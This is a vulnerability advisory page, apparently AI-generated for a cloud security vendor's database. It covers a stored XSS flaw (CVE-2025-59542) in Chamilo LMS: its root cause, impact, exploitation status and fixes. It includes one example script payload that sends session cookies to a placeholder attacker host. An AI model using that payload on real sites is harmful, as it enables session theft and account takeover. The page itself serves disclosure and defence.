
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2025-59542 is a stored cross-site scripting (XSS) vulnerability in Chamilo LMS, a widely used open-source learning management system. An attacker with a low-privileged account (e.g., a trainer) can inject malicious JavaScript into the course learning path Settings field, which then executes in the browser context of any user — including administrators — who views the affected course information page. The vulnerability affects Chamilo LMS versions prior to 1.11.34 (specifically confirmed in v1.11.32) and was disclosed on March 5–6, 2026. It carries a CVSS v3.1 base score of 9.0 (Critical) (GitHub Advisory, Red Hat CVE).
The root cause is improper neutralization of user-supplied input in the course learning path Settings field before it is stored and subsequently rendered in web pages (CWE-79: Stored XSS). The affected component is Course Management → Course → Learning Path Settings, where input is not adequately sanitized or encoded before being persisted to the database and reflected back to users. An attacker with trainer-level (low-privilege) access can craft a malicious JavaScript payload and save it in the Settings field; the payload executes automatically in the victim's browser when they navigate to the course information page, requiring no further interaction beyond the page visit. The attack vector is network-based, requires low privileges, and only requires that a victim user view the affected page (GitHub Advisory).
Successful exploitation enables session cookie or authentication token exfiltration, leading to account takeover (ATO) of higher-privileged users, including administrators. This allows privilege escalation from trainer to admin, granting an attacker full control over the LMS instance — including access to user data, course content, and system configuration. The CVSS score reflects high impacts on confidentiality, integrity, and availability, as a compromised admin account can be leveraged to further compromise the entire platform (GitHub Advisory).
As of the time of disclosure, there is no public proof-of-concept exploit code and no evidence of in-the-wild exploitation (Feedly). The EPSS score is approximately 0.041% (0.000410), indicating a low current probability of exploitation in the wild. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. The vulnerability was reported by researcher prakhar0x01 (GitHub Advisory).
<script>document.location='https://attacker.com/steal?c='+document.cookie;</script> or an equivalent XSS vector that exfiltrates session cookies to an attacker-controlled server.The primary remediation is to upgrade Chamilo LMS to version 1.11.34 or later, which was released as a security-focused update and includes a fix for this vulnerability (GitHub Release). As interim mitigations, administrators should restrict trainer and low-privileged account permissions to prevent modification of course learning path settings, and implement Content Security Policy (CSP) headers to limit JavaScript execution contexts. Monitoring administrative accounts for suspicious activity and auditing learning path settings fields for unexpected script content is also recommended (GitHub Advisory).
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."